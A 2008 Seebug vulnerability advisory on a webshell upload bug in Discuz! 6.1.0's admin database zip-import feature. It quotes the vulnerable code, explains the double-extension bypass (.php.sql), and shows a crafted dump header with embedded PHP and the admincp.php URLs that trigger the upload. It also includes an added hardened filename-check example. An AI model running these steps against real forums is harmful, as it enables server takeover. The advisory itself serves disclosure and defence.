Discuz! admin/database.inc.php get-webshell bug

2008-11-28T00:00:00
ID SSV:4505
Type seebug
Reporter Root
Modified 2008-11-28T00:00:00

Description

When action=importzip is used, admin\database.inc.php in Discuz! extracts a zip file in a way that lets an attacker obtain a webshell. The relevant code in admin\database.inc.php (the `*` quantifiers, `\.` escape and `\\1` backreference below are restored from the Discuz! source; the extracted copy of this page had lost them):

.....
elseif($operation == 'importzip') {

require_once DISCUZ_ROOT.'admin/zip.func.php';
$unzip = new SimpleUnzip();
$unzip->ReadFile($datafile_server);
if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {
cpmsg('database_import_file_illegal', '', 'error');
}

$identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));
$confirm = !empty($confirm) ? 1 : 0;
if(!$confirm && $identify[1] != $version) {
cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form');
}

$sqlfilecount = 0;
foreach($unzip->Entries as $entry) {
if(preg_match("/\.sql$/i", $entry->Name)) {
$fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');
fwrite($fp, $entry->Data);
fclose($fp);
$sqlfilecount++;
}
}
......

Two points to note:
1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0)) only checks the final suffix, so Apache's multiple-extension handling makes a file named like 081127_k4pFUs3C-1.php.sql pass the check and still be treated as PHP.
2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256)))); means the first entry must follow the Discuz! dump header format, otherwise the version check fails. (You can make a backup first, then modify it and repackage it as a zip.) The dump format looks like this:

# Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ==
<?phpinfo();?>
# <?exit();?>
# Discuz! Multi-Volume Data Dump Vol.1
# Version: Discuz! 6.1.0
# Time: 2008-11-27 11:38
# Type: discuz
# Table Prefix: cdb_
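The check the advisory points at is a suffix-only test, so it accepts names carrying a second extension. The following is an added example and not Discuz! code: it places that permissive pattern next to a strict allow-list pattern and runs both over constructed entry names. The function names, the allow-list policy and the safe_write_entry helper are assumptions for illustration; the strict pattern additionally rejects a trailing newline, which a bare `$` anchor in PCRE lets through.

```php
<?php
// Added example, not Discuz! code: the permissive entry-name test used in
// admin/database.inc.php beside a strict allow-list, run over constructed names.

// The original pattern: only the suffix is checked, so a second extension
// such as ".php.sql" passes, and "$" still matches before a trailing newline.
function weak_is_sql_name(string $name): bool
{
    return preg_match("/\.sql$/i", $name) === 1;
}

// Hardened pattern (assumed policy): one safe token plus ".sql", anchored with
// \A and \z so no path separators, extra dots or trailing newline get through.
function strict_is_sql_name(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\.sql\z/i', $name) === 1;
}

// Writes an entry only when the name passes the strict check and the backup
// directory resolves; the name contains no separators or dots besides the
// extension, so the target stays inside $backupdir. Hypothetical helper.
function safe_write_entry(string $backupdir, string $name, string $data): bool
{
    if (!strict_is_sql_name($name)) {
        return false;
    }
    $dir = realpath($backupdir);
    if ($dir === false || !is_dir($dir)) {
        return false;
    }
    return file_put_contents($dir . DIRECTORY_SEPARATOR . $name, $data, LOCK_EX) !== false;
}

// Constructed sample names; the second has the shape the advisory describes.
$samples = [
    '081127_backup-1.sql',
    '081127_k4pFUs3C-1.php.sql',
    "dump.sql\n",
];
foreach ($samples as $n) {
    printf("%-30s weak=%-6s strict=%s\n", json_encode($n),
        weak_is_sql_name($n) ? 'pass' : 'reject',
        strict_is_sql_name($n) ? 'pass' : 'reject');
}
```

Run with `php example.php`: the first name passes both checks, the double-extension name and the newline-terminated name pass only the weak check. Validating the whole name against an allow-list, rather than the suffix alone, is the change that closes the case the advisory describes.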

Affected: Discuz! 6.1.0

Solution: none yet

Submit:

<6.0 : admincp.php?action=importzip&datafile_server=./attachment_path/attachment_name.zip&importsubmit=yes
=6.1 : admincp.php?action=database&operation=importzip&datafile_server=./attachment_path/attachment_name.zip&importsubmit=yes&frames=yes